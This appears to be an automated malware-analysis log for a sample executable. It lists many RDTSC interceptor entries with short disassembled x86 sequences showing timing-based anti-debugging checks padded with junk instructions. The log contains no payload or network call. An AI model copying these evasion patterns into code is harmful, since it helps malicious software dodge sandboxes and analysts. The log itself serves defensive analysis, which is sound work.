Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 812E22 second address: 812E41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 812E41 second address: 812E47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 722025 second address: 722050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C8h 0x00000007 jmp 00007F9F08C2E4BBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 722050 second address: 722054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 818D11 second address: 818D45 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2E4BCh 0x00000008 push ebx 0x00000009 jmp 00007F9F08C2E4C6h 0x0000000e jc 00007F9F08C2E4B6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 818D45 second address: 818D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F9F08C2F7DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 818D5C second address: 818D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 81C1AF second address: 81C1B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 81C1B8 second address: 81C1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 81C1C1 second address: 81C1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8254FF second address: 825513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BDh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 825513 second address: 825518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 825518 second address: 82555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BEh 0x00000009 jmp 00007F9F08C2E4C2h 0x0000000e popad 0x0000000f push edi 0x00000010 jmp 00007F9F08C2E4C0h 0x00000015 pop edi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F9F08C2E4B6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 820574 second address: 820584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9F08C2F7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 820584 second address: 820588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 831C84 second address: 831C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 831940 second address: 83195F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F08C2E4C8h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 83195F second address: 831969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9F08C2F7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84747E second address: 847484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8463B2 second address: 8463F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E6h 0x00000007 push ecx 0x00000008 jp 00007F9F08C2F7D6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jp 00007F9F08C2F7EBh 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 846C35 second address: 846C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 846F06 second address: 846F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84A319 second address: 84A31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84B502 second address: 84B508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84B508 second address: 84B50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84B50E second address: 84B512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84B512 second address: 84B516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84B516 second address: 84B51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84CC56 second address: 84CC63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84CC63 second address: 84CC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 84CC67 second address: 84CC7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F08C2E4B6h 0x00000008 jmp 00007F9F08C2E4BDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 76EB29 second address: 76EB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 76EB2D second address: 76EB33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 76EB33 second address: 76EB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F9F08C2F7EEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 76EB5E second address: 76EB65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D20495 second address: 4D20499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D20499 second address: 4D2049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D2049F second address: 4D204CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 mov bx, 5C98h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9F08C2F7E9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D204CA second address: 4D204D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D204D0 second address: 4D20517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F9F08C2F7E0h 0x00000011 mov ecx, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9F08C2F7DDh 0x0000001d jmp 00007F9F08C2F7DBh 0x00000022 popfd 0x00000023 movzx esi, di 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D407FF second address: 4D4080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D4080F second address: 4D40853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9F08C2F7DBh 0x00000016 or ah, FFFFFFAEh 0x00000019 jmp 00007F9F08C2F7E9h 0x0000001e popfd 0x0000001f mov cx, EA37h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40853 second address: 4D408E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov ecx, 5DEF36C3h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 call 00007F9F08C2E4C4h 0x00000018 pop eax 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007F9F08C2E4C8h 0x00000029 jmp 00007F9F08C2E4C5h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 jmp 00007F9F08C2E4BEh 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a call 00007F9F08C2E4BDh 0x0000003f pop esi 0x00000040 push edx 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D408E1 second address: 4D408FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 47h 0x0000000d mov edi, eax 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D408FD second address: 4D40901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40901 second address: 4D40907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40907 second address: 4D40940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2E4C6h 0x00000009 sub eax, 156C7638h 0x0000000f jmp 00007F9F08C2E4BBh 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40940 second address: 4D40945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40945 second address: 4D4094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D4094B second address: 4D4094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D4094F second address: 4D4097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F9F08C2E4C9h 0x00000011 pop ecx 0x00000012 mov bx, EEA4h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D4097A second address: 4D409D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 pushfd 0x00000006 jmp 00007F9F08C2F7E5h 0x0000000b or ax, 2796h 0x00000010 jmp 00007F9F08C2F7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov edi, 6F219CD2h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9F08C2F7E9h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D40A56 second address: 4D30214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007F9F08C2E4C5h 0x0000000d leave 0x0000000e jmp 00007F9F08C2E4BEh 0x00000013 retn 0004h 0x00000016 nop 0x00000017 sub esp, 04h 0x0000001a xor ebx, ebx 0x0000001c cmp eax, 00000000h 0x0000001f je 00007F9F08C2E61Ah 0x00000025 mov dword ptr [esp], 0000000Dh 0x0000002c call 00007F9F0D3CA802h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007F9F08C2E4BDh 0x00000039 pushfd 0x0000003a jmp 00007F9F08C2E4C0h 0x0000003f sbb ecx, 00B459C8h 0x00000045 jmp 00007F9F08C2E4BBh 0x0000004a popfd 0x0000004b pop ecx 0x0000004c popad 0x0000004d push esi 0x0000004e pushad 0x0000004f call 00007F9F08C2E4BEh 0x00000054 pop edi 0x00000055 popad 0x00000056 mov dword ptr [esp], ebp 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F9F08C2E4C5h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30214 second address: 4D30229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30229 second address: 4D30289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9F08C2E4C3h 0x00000014 add esi, 3194582Eh 0x0000001a jmp 00007F9F08C2E4C9h 0x0000001f popfd 0x00000020 call 00007F9F08C2E4C0h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30289 second address: 4D302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7E2h 0x00000011 mov si, FBA1h 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ax, di 0x0000001d pushfd 0x0000001e jmp 00007F9F08C2F7E5h 0x00000023 adc al, 00000026h 0x00000026 jmp 00007F9F08C2F7E1h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D302DF second address: 4D3031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F9F08C2E4BBh 0x00000012 jmp 00007F9F08C2E4C8h 0x00000017 pop ecx 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D3036A second address: 4D30370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30370 second address: 4D303AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F9F08C2E4C0h 0x0000000b xor al, 00000078h 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub ebx, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9F08C2E4C2h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D303AE second address: 4D303B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D303B3 second address: 4D30453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9F08C2E4C7h 0x0000000a xor ah, FFFFFF9Eh 0x0000000d jmp 00007F9F08C2E4C9h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 sub edi, edi 0x00000018 jmp 00007F9F08C2E4C7h 0x0000001d inc ebx 0x0000001e pushad 0x0000001f movzx ecx, di 0x00000022 jmp 00007F9F08C2E4C1h 0x00000027 popad 0x00000028 test al, al 0x0000002a pushad 0x0000002b mov al, 61h 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 je 00007F9F08C2E6C6h 0x00000037 pushad 0x00000038 mov edi, 54A518D4h 0x0000003d mov si, di 0x00000040 popad 0x00000041 lea ecx, dword ptr [ebp-14h] 0x00000044 jmp 00007F9F08C2E4BFh 0x00000049 mov dword ptr [ebp-14h], edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push esi 0x00000050 pop edx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30475 second address: 4D30490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30490 second address: 4D30504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9F08C2E4C3h 0x00000013 jmp 00007F9F08C2E4C3h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F9F08C2E4C8h 0x0000001f sub ax, 5938h 0x00000024 jmp 00007F9F08C2E4BBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30504 second address: 4D30550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F9F08C2F7E9h 0x00000014 pushfd 0x00000015 jmp 00007F9F08C2F7E0h 0x0000001a xor ecx, 5D63FDF8h 0x00000020 jmp 00007F9F08C2F7DBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30550 second address: 4D30556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D305BC second address: 4D305C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D305C2 second address: 4D305C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D305C6 second address: 4D30615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F9F7995D694h 0x0000000e pushad 0x0000000f mov cl, bl 0x00000011 jmp 00007F9F08C2F7DEh 0x00000016 popad 0x00000017 js 00007F9F08C2F828h 0x0000001d jmp 00007F9F08C2F7E0h 0x00000022 cmp dword ptr [ebp-14h], edi 0x00000025 pushad 0x00000026 jmp 00007F9F08C2F7DEh 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, 726AB597h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30615 second address: 4D30697 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 031B1433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F9F7995C332h 0x00000010 pushad 0x00000011 jmp 00007F9F08C2E4C4h 0x00000016 mov dx, cx 0x00000019 popad 0x0000001a mov ebx, dword ptr [ebp+08h] 0x0000001d jmp 00007F9F08C2E4BCh 0x00000022 lea eax, dword ptr [ebp-2Ch] 0x00000025 jmp 00007F9F08C2E4C0h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d mov cl, ABh 0x0000002f jmp 00007F9F08C2E4C9h 0x00000034 popad 0x00000035 jmp 00007F9F08C2E4C0h 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30697 second address: 4D3069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D3069B second address: 4D306A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D306A1 second address: 4D306CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 06ED6B58h 0x00000008 mov edx, 6879E504h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9F08C2F7E3h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D306CB second address: 4D306FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9F08C2E4C1h 0x0000000a add eax, 7B5E21A6h 0x00000010 jmp 00007F9F08C2E4C1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
